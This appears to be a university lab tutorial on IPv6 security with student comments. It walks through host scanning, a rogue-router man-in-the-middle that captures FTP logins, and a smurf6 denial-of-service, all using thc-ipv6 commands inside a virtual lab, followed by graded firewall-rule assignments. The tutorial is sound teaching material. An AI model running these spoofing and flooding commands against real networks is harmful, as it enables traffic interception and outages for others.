IPv6-based vulnerabilities

Authors: Mikhail Zolotukhin, Lauri Sormunen and Timo Hämäläinen

1. Introduction

The central routing protocol of the Internet, IPv4, has had its address space nearly exhausted since 2011. Due to limitation of address space size, the protocol cannot anymore support the growing number of devices connected to the Internet. Even though the successor protocol IPv6 was developed during 1990s and since then support for it has existed in most networking devices for years, the protocol still has not been widely adopted. From a security point of view, the lack of usage and knowledge on the subject may leave undiscovered vulnerabilities to firewalls of IPv6 enabled devices.

The remainder of this tutorial is organized as follows. Several preliminary tasks are presented in Section 2. Section 3 shows how to configure IPv6 for your virtual network established in previous exercises. A few IPv6 attacks are demonstrated in Section 4. In Section 5, the firewall of the router is configured in such way that the attacks can be mitigated or prevented. Section 6 concludes the tutorial.

This tutorial (including assignments) takes on average 7.81 hours to complete.

2. Preliminary questions

And now it does not...

— 05 Oct 23

What is IPv6? What are differences between IPv4 and IPv6? What are the main advantages of IPv6?
Read section 3 of article "A Survey on IPv6 Security Threats and Defense Mechanisms". What are the main security threats in IPv6 networks?

I seem to be unable to access the "Survey on IPv6 Security Threaths and Defense Mechanisms". Requires login via institution, but JYU is not on the list EDIT: Works now

— 25 Sep 23 (edited 27 Sep 23)

Just buy the article, its only 30 eur

Edit: added "ezproxy.jyu.fi" to the link, should work from outsiide of jyu net now

— 05 Oct 23 (edited 05 Oct 23)

3. Preparing IPv6 network

Start the following VMs: gateway, dnsserv, bob, webserv and kali. If you enabled access to pfSense web configurator on host machine as it was described in the first tutorial, you can reconfigure pfSense settings from the host, otherwise, you will also need to start alice-VM.

Most operating systems are by default configured to prefer IPv6 addresses and will assign them to interfaces, if available. You may notice an IPv6 address by typing in the terminal of one of your Ubuntu VMs, e.g. bob-VM:
```
$ ifconfig
```
If you don't have "ifconfig" tool, you can install it by typing:
```
$ sudo apt install net-tools
```
Information about the network interface will be printed out, for example:
```
enp0s3      Link encap:Ethernet HWaddr 08:00:27:e7:52:3f
            inet addr:192.168.10.102 Bcast:192.168.10.255 Mask:255.255.255.0
            inet6 addr: fe80::a00:27ff:fee7:523f/64 Scope:Link
```
The last line implies that interface enp0s3 has an IPv6 address and its scope is Link (more often Link-Local). If the scope is Global and the prefix of the address is in 2000::/3, you are likely to have a public IPv6 address, accessible anywhere in IPv6 Internet. In this exercise, we are going to use Unique Local Addresses (ULAs) within prefix fc00::/7.

In pfsense web configurator, navigate to System -> Advanced. Click "Networking" in the upper part of the page. In "IPv6 Options", make sure that checkbox "All IPv6 traffic will be blocked by the firewall unless this box is checked" is checked there. Scroll down and save changes.

Assign the IPv6 addresses for OPT1 and OPT2 interfaces of the gateway. In pfSense web configurator, go to Interfaces -> OPT1. Set "IPv6 Configuration Type" to "Static IPv6". Scroll down and in Static IPv6 Configuration section set "IPv6 address" to "fc00::1:0:0:0:1" and mask to "64". Save and apply the settings.

Go to Interfaces -> OPT2. Set "IPv6 Configuration Type" to "Static IPv6". Scroll down and in Static IPv6 Configuration section set "IPv6 address" to "fc00::2:0:0:0:1" and mask to "64". Save and apply the settings.

Next, we enable DHCPv6 to make dual-stacked DHCP clients in our virtual network to adopt the IPv6 addresses automatically. This is done by navigating to Services -> DHCPv6 Server & RA and for OPT1 interface check "Enable DHCPv6 server on interface OPT1" and set the "from" and "to" fields of Range to "fc00:0:0:1::" and "fc00::1:ffff:ffff:ffff:ffff", respectively. Make sure there are no extra spaces, oherwise it will not be accepted by pfSense. Click "Save".

Switch to OPT2 interface, check "Enable DHCPv6 server on interface OPT2" and set the "from" and "to" fields of Range to "fc00:0:0:2::" and "fc00::2:ffff:ffff:ffff:ffff", respectively. Make sure there are no extra spaces, oherwise it will not be accepted by pfSense. Click "Save".

We have to move bob-VM to OPT2 subnet. For this reason, on bob-VM, open netplan configuration file:
```
$ sudo nano /etc/netplan/01-network-manager-all.yaml
```
edit it as follows:
```
network:
  version: 2
  ethernets:
    enp0s3:
     dhcp4: no
     addresses: [192.168.12.102/24]
     gateway4: 192.168.12.1
     nameservers:
       addresses: [8.8.8.8,8.8.4.4]
```
then execute:
```
$ sudo netplan apply
```
Shut bob-VM down. After that, select bob-VM in VirtualBox Manager, go to Settings -> Network -> Adapter 1 and change its internal network from "lan" to "opt2". Click OK and start the VM. Once it has started, check its network interface:
```
$ ifconfig enp0s3
```
There should be IPv6 address with scopeid global and mask 64. Also check that you still have access to the internet by pinging some external host.

On webserv-VM and kali-VM, type
```
$ ifconfig
```
and make sure that primary interfaces of these VMs also have an IPv6 addresses with mask 64 and global scope. If fc00-prefixed address is not available on one of the machines, restart it.

I have double-checked every step and rebooted all machines, but there are still no fc00-prefixed addresses.

EDIT: Somehow it didn't work to use the pfSense web configurator on the host machine. I had to do it via alice-VM.

— 22 Sep 23 (edited 22 Sep 23)

this does not sound like a correct statement, but ok :)

— 29 Sep 23

We now need to install an FTP server on our webserv-VM and an FTP client on the bob-VM. First, type in the web server's terminal:
```
$ sudo apt install vsftpd -y
```
If this fails, try to run
```
$ sudo apt update
```
to update the package manager lists, and then repeat the previous command.

Now, verify that the server is running in IPv6 enabled mode. Open the configuration file in nano:
```
$ sudo nano /etc/vsftpd.conf
```
Check that following settings are present and not commented by "#", and if not, add or uncomment them:
```
listen=NO
...
listen_ipv6=YES
...
anonymous_enable=NO
...
local_enable=YES
...
write_enable=YES
```
Save the file and restart the FTP server:
```
$ sudo systemctl restart vsftpd
```
You can check that the server is listening by executing
```
$ sudo netstat -ln6 | grep 21
```
and checking if the output includes the line
```
tcp6    0   0 :::21         :::*        LISTEN
```

Edit your firewall rules for OPT2 subnet to allow IPv6 traffic to the webserv-VM from bob-VM. The easiest way is to edit address family of your OPT2 net "pass all" rule (action: pass, source: OPT2 net, destination: any, protocol: any) from "IPv4" to "IPv4+IPv6". Modify this rule as instructed. This rule (rather its IPv6 part) is one of the rules required in the advanced assignment, so do not make mistakes here.

Just to clarify: when using "IPv4+IPv6", pfSense will generate two rules: one - for IPv4 and another - for IPv6. We are obviously only interested in the IPv6 part of the rule in this assignment. Keep this in mind when using pfctl to print the rules.

Install FTP client on bob-VM:
```
$ sudo apt install lftp -y
```
Check that you can connect to the FTP server and execute commands (you can find "webserv-ipv6-global-scope-address" by running "ifconfig" on webserv-VM):
```
$ lftp <webserv-ipv6-global-scope-address>
~> user webserv
Pass: <Enter webserv>
```
Once connected, type e.g. "ls" to list all files in home directory, or some other commands. Please make sure that everything is working properly before moving to the next section, e.g. when you type "ls" you see the list of files on the server, etc. Once you have checked that you can execute commands via FTP from bob-VM, just type exit.

4. Attacks against IPv6 networks

4.1 Scanning hosts

Deployment of IPv6 enables a large address space for each subnet, since most network prefixes have length of 64 bits. The 64 least significant bits are left as interface IDs for devices in the network, enabling theoretically $2^{64}$ addresses for different devices. Provided that all addresses for devices are not selected in numerical order, the network will become too large to scan from outside.

However, there are methods of scanning a network from the inside using Multicast address, ff02::1. This can simply be done by multicasting ping. In kali-VM's terminal, run:
```
$ ping6 ff02::1%eth0
```
where eth0 is the interface of kali-VM connected to OPT2. It is worth noticing that many network tools have version for IPv6 by either using a separate program or adding a "-6" argument. When using local area multicast or Link-Local addresses, you have to specify the network interface. Otherwise, the OS cannot know which network you are referring to.

On kali-VM, run:
```
$ sudo atk6-alive6 eth0 -v
```
to print the Link-Local IPv6 addresses of the hosts in OPT2 (replace eth0 with the actual interface name, if necessary). If the package is missing, you can install it as follows:
```
$ sudo apt -o Acquire::ForceIPv4=true install thc-ipv6
```
View the neighboring hosts by their type
```
$ ip -6 neigh
```
and find the address which marked as a router. If there is no any, you probably have done something wrong. Double-check all the previous steps.

4.2 Man-In-The-Middle

IPv6 enables any device in the network to advertise itself as a router by multicasting router advertisements (RA). In this tutorial, we are going to advertise kali-VM as a router. For this purpose, on kali-VM, open network configurations:
```
$ sudo nano /etc/network/interfaces
```
and add one more interface by adding the following lines at the end of the file:
```
auto eth1
iface eth1 inet static
address 192.168.11.102
netmask 255.255.255.0
gateway 192.168.11.1
```
Shutdown kali-VM.

We need to install another network interface on kali-VM. For this reason, in VirtualBox Manager, select "kali", go to Settings -> Network -> Adapter 2. Enable it, attach the adapter to internal network, and choose "opt1" as the name for the network.

Now you can boot kali-VM. Once it is up, check its network interfaces:
```
$ ifconfig
```
There should be IPv6 address with scopeid global and mask 64 on both "eth0" and "eth1". Also check that you still have access to the internet by pinging some external host.

On bob-VM, check webserv-VM's IPv6 address with global scope and start pinging this address:
```
$ ping6 <webserv-global-scope-address>
```
e.g. in my case the command looked like
```
$ ping6 fc00::1:a00:27ff:fefa:e86f
```
It should work. Let it run.

From kali-VM, find out the link-local address of OPT2 interface of the router:
```
$ sudo atk6-alive6 eth0 -v
```
and then
```
$ ip -6 neigh
```

From kali-VM, start spreading router advertisements with lifetime of 0 by running the following command:
```
$ sudo atk6-kill_router6 eth0 <router-opt2-link-local-address>
```
e.g. in my case, the command looked as follows:
```
$ sudo atk6-kill_router6 eth0 fe80::a00:27ff:fea9:31ba
```
The address in your case is obviously different.

Tip: this router opt2 address can be obtained from the list returned by the previous command, i.e. "ip -6 neigh"; the line you are interested in contains "eth0" and "router"

— 17 Oct 23 (edited 17 Oct 23)

Open one more terminal on kali-VM and find out the link-local addresses of OPT1 interface of the router:
```
$ sudo atk6-alive6 eth1 -v
```
and then
```
$ ip -6 neigh
```
Eliminate this interface too, to be able to receive traffic from both directions later:
```
$ sudo atk6-kill_router6 eth1 <router-opt1-link-local-address>
```

Tip: similarly, the router opt1 address can also be obtained from the list returned by command "ip -6 neigh", but this time the line you are interested in contains "eth1" and "router"

— 17 Oct 23 (edited 17 Oct 23)

Open one more terminal on kali-VM. First, we enable IPv6 forwarding on kali-VM:

$ sudo sysctl -w net.ipv6.conf.all.forwarding=1

and add a new route for each interface:

$ sudo ip route add fc00:0:0:2::/64 dev eth0

$ sudo ip route add fc00:0:0:1::/64 dev eth1

Then, we start multicasting router advertisements from kali-VM:

$ sudo atk6-fake_router26 -A fc00:0:0:2::/64 -a 30 eth0

and in another terminal

$ sudo atk6-fake_router26 -A fc00:0:0:1::/64 -a 30 eth1

Open Wireshark in another terminal on kali-VM:
```
$ sudo wireshark
```
and start capturing traffic on eth0, i.e. the first interface connected to OPT2.

Go back to bob-VM, make sure that pinging still works and stop it. Then, connect to the FTP server using the FTP client software:
```
$ lftp <webserv-ipv6-global-scope-address>
~> user webserv
Pass: <Enter webserv>
```
As previously, you can check "webserv-ipv6-global-scope-address" by running "ifconfig enp0s3" on webserv. Enter some commands in the FTP client, e.g. list directories "ls", or download a file using "get" command.

Once you have logged in using FTP and run a couple of commands, stop capturing packets in Wireshark on kali-VM. Save the resulting capture file as we will need it later during the assignment.

Stop all the stuff running in kali-VM's terminals.

4.3 Denial-of-Service

There are numerous options for Denial-of-Service attacks on IPv6. The large address space of IPv6 offers more devices to be utilized in distributed denial of service (DDoS) attacks. A common option for executing a denial of service attack is to bombard the target with ICMP messages. Being a stateless protocol, ICMP replies are generally accepted even if no query was initially made using ICMP. The most common ICMP messages are caused by simple pinging. A smurf attack is a DDoS attack, in which the source address of a ping is forged and those forged requests are sent to multiple nodes of the network. The nodes of the network respond to the target node, effectively impairing the network interface of the target and loading up its CPU.

In this section, we demonstrate the IPv6 version of a DDoS attack in our OPT2 network. To monitor performance, first start pinging the gateway from the bob-VM:
```
$ ping6 fc00:0:0:2::1 -i 3
```
The response times should mostly be less than 1 ms. Furthermore, go to the pfSense's web configurator, select Status -> Traffic Graph and choose interface OPT2 to start monitoring traffic on that interface.

Had to reboot Bob-VM to get this ping to work after previous.

— 22 Sep 23

Now, we can start the attack from kali-VM's terminal against the gateway's interface with address fc00:0:0:2::1:
```
$ sudo atk6-smurf6 eth0 fc00:0:0:2::1 ff02::1/64
```
This causes all the nodes in OPT2 to send ICMP replies to the router, even if it did not send any requests.

After that, the response time for bob-VM which is currently pinging the web server should change significantly. Try to access the bank web site from bob-VM's browser:
```
192.168.11.2/accounts 
```
The page might become unavailable.

You can take a screenshot of a few lines of the ping output logs with reply times obtained from bob-VM during the attack. Also, take a screenshot of the traffic graph from pfSense's web configurator, in which the attack is clearly visible.

The attack may be so powerful that pfsense becomes unresponsive and will not update the traffic graph. If this is the case, stop the attack from kali-VM's terminal where the smurf command is running by pressing Ctrl+C. This should give the gateway some air and it should plot the graph :) In this case, take the screenshot once the graph has updated, i.e. immediately after the attack has been stopped.

5. Assignments

5.1 Preliminary

Complete the test below based on the preliminary questions (1 point).

# ipv6_basic1

# ipv6_basic2

5.2 Basic

Complete the test below based on the tutorial results (1.0 points):

# ipv6_basic3

# ipv6_basic4

# ipv6_basic5

# ipv6_basic6

Highly possibly that I just don't get something, but this description seems quite unclear. Which command "marks" ... is it meant that this command sets a device with a certain ip adress to act as the router?

— 19 Oct 23

highlights

— 19 Oct 23

# ipv6_basic7

Find information in the Internet about IPv6 address allocation and complete the test below (0.5 points).

# ipv6_basic8

What can be simple protection mechanisms against the attacks described in the tutorial? Complete the test below devoted to the attack countermeasures (0.5 points).

# ipv6_basic14

5.3 Advanced

Implement several rules in the pfSense firewall to manage IPv6 traffic in your virtual network. The rules should be implemented in subnets OPT1 and OPT2 using exclusively IPv6 protocol.

For OPT1 subnet, implement the following 2 rules:

ICMPv6 messages to OPT2 from OPT1 should be blocked
The rest of IPv6 traffic from OPT1 should be allowed

For OPT2 subnet, implement the following 9 rules:

Web server should be accessible using TCP over IPv6 via HTTP, HTTPS and FTP ports from any host of OPT2 subnet
Web server should be accessible using TCP over IPv6 via SSH only from bob-VM
Other IPv6 traffic to the web server from other OPT2 hosts should be blocked
Web interface of pfSense should be accessible using TCP over IPv6 via HTTPS only from bob-VM
Any other IPv6 traffic from OPT2 to pfSense's OPT2 address should be blocked
ICMPv6 messages to OPT1 from OPT2 should be blocked
The rest of IPv6 traffic from OPT2 should be allowed

Tips:

Use global scope IP addresses for the webserv and bob
For the gateway use the IPv6 address from OPT2 net, i.e. "OPT2 address" (fc00:0:0:2::1)

You can test your rules by running "nmap -6 <target ipv6 address> -p <port list>" from different VMs in the network.

Also, remember that during the tutorial we have added kali-VM to OPT1 subnet, which might cause confusion during the rule tests. Thus, it is recommended to disable the second interface on kali-VM that corresponds to OPT1 subnet.

When creating the rules, use some distinctive identifiers for the description, e.g. "ipv6 opt1" and "ipv6 opt2" so that you can easily extract these rules using pfctl in the pfSense shell as it has been done in one of the previous assignments. As previously, the pfSense's network interface names are assumed to be "em2" and "em3". Subnet IPv6 addresses are expected to correspond to the ones configured in the tutorial, i.e. fc00:0:0:1::/64 and fc00:0:0:2::/64.

Print your rules with pfctl and copy-paste them in the correct order (i.e. in the same order as they are shown in the rule tables) to the corresponding answer boxes below. Separate the rules from each other with an empty line.

OPT1 IPv6 rules (2 rules, 0.4 points)

# ipv6_advanced1

OPT2 IPv6 rules (9 rules, 1.6 points)

# ipv6_advanced2

Points 0.4 / 1.6, but the nmap check from bob and kali gives the states as required. Any hint what might be wrong?

— 05 Oct 23

Two of your block rules are identical, the grading script has hard time to understand what are you doing there...

— 11 Oct 23

5.4 General comments and feedback

Let us know how many hours in total have you spent on this assignment:

# ipv6_time

On a scale from 1 to 10, estimate how interesting and difficult was the tutorial:

# ipv6_interest

# ipv6_difficulty

You can also give us some general feedback:

# ipv6_feedback

6. Conclusion

This tutorial briefly overviews a few common attacks against an IPv6 network. While large address space optionally restores the end-to-end functionality of the Internet, it opens up more devices for attack attempts. While the number of devices in IPv6 Internet is rapidly growing, the older devices still may have implementation flaws due to long transition time. Also IPv6 may be enabled in many devices even if not actively monitored.

More information on the topic can be found at:

IPv6 basics link does not work

— 15 Oct 23

thanks, fixed

— 16 Oct 23